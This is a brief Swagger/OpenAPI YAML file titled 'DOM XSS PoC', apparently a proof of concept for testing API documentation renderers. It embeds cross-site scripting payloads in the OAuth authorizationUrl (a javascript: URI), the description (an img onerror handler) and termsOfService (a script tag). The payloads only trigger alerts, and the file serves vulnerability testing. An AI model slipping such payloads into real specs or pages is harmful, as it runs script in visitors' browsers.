swagger: '2.0'
security:
  - a: []
components:
  securitySchemes:
    a:
      type: oauth2
      authorizationUrl: 'javascript:alert(document.domain)//'
info:
  version: 1.0.0
  title: DOM XSS PoC
  description: "<img src="/" =_=" title="onerror='prompt(1)'">"
  termsOfService: "<script>alert('xss')</script>"
paths:
  /:
    get:
      responses:
        '200':
          description: Echo GET
